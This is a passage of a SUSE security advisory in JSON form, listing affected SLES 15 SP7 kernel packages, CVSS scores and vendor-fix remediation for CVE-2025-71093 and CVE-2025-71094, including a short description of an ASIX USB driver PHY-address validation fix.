"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71093",
"url": "https://www.suse.com/security/cve/CVE-2025-71093"
},
{
"category": "external",
"summary": "SUSE Bug 1256777 for CVE-2025-71093",
"url": "https://bugzilla.suse.com/1256777"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71093"
},
{
"cve": "CVE-2025-71094",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71094"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: usb: asix: validate PHY address before use\n\nThe ASIX driver reads the PHY address from the USB device via\nasix_read_phy_addr(). A malicious or faulty device can return an\ninvalid address (\u003e= PHY_MAX_ADDR), which causes a warning in\nmdiobus_get_phy():\n\n addr 207 out of range\n WARNING: drivers/net/phy/mdio_bus.c:76\n\nValidate the PHY address in asix_read_phy_addr() and remove the\nnow-redundant check in ax88172a.c.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71094",
"url": "https://www.suse.com/security/cve/CVE-2025-71094"
},
{
"category": "external",
"summary": "SUSE Bug 1256597 for CVE-2025-71094",
"url": "https://bugzilla.suse.com/1256597"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
